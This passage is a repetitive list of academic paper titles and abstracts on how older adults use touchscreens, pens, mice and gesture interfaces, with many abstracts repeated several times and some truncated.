care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we presented a concept from the focus on human necessity and use a cognitive assessment tool, which is, Cognitrone test, to measure older adult's attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elder participants were participated. Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. ::: ::: This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involves few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Gestural interfaces for elderly users: Help or hindrance paper_content: In this paper we investigate whether finger gesture input is a suitable input method, especially for older users (60+) with respect to age-related changes in sensory, cognitive and motor abilities. We present a study in which we compare a group of older users to a younger user group on a set of 42 different finger gestures on measures of speed and accuracy. The size and the complexity of the gestures varied systematically in order to find out how these factors interact with age on gesture performance. The results showed that older users are a little slower, but not necessarily less accurate than younger users, even on smaller screen sizes, and across different levels of gesture complexity. This indicates that gesture-based interaction could be a suitable input method for older adults. At least not a hindrance - maybe even a help. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we presented a concept from the focus on human necessity and use a cognitive assessment tool, which is, Cognitrone test, to measure older adult's attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elder participants were participated. Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Comparison between single-touch and multi-touch interaction for older people paper_content: This paper describes a study exploring the multi-touch interaction for older adults. The aim of this experiment was to check the relevance of this interaction versus single-touch interaction to realize object manipulation tasks: move, rotate and zoom. For each task, the user had to manipulate a rectangle and superimpose it to a picture frame. Our study shows that adults and principally older adults had more difficulties to realize these tasks for multi-touch interaction than for single-touch interaction. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. ::: ::: This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involves few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. ::: ::: This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involves few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. ::: ::: This paper describes the formative 